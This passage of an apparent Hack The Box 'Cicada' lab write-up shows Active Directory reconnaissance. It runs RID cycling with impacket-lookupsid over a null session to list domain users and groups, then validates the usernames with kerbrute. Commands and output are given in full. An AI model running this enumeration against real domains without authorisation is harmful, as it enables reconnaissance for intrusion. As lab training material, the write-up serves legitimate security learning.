RID Cycling
Both the SMB and MSRPC servers allows null session. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-lookupsid CICADA.HTB/blahblah@cicada-dc.cicada.htb 100000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at cicada-dc.cicada.htb
[*] StringBinding ncacn_np:cicada-dc.cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
Performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah
Found the following domain users;
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Those usernames have been saved to the users.txt
file
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ kerbrute userenum --dc cicada-dc.cicada.htb -d CICADA.HTB ./users.txt -t 200
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop
2024/09/28 22:24:16 > Using KDC(s):
2024/09/28 22:24:16 > cicada-dc.cicada.htb:88
2024/09/28 22:24:16 > [+] VALID USERNAME: john.smoulder@CICADA.HTB
2024/09/28 22:24:16 > [+] VALID USERNAME: emily.oscars@CICADA.HTB
2024/09/28 22:24:16 > [+] VALID USERNAME: sarah.dantelia@CICADA.HTB
2024/09/28 22:24:16 > [+] VALID USERNAME: david.orelious@CICADA.HTB
2024/09/28 22:24:16 > [+] VALID USERNAME: michael.wrightson@CICADA.HTB
2024/09/28 22:24:16 > Done! Tested 5 usernames (5 valid) in 0.027 seconds
5 usernames have been validated against the target KDC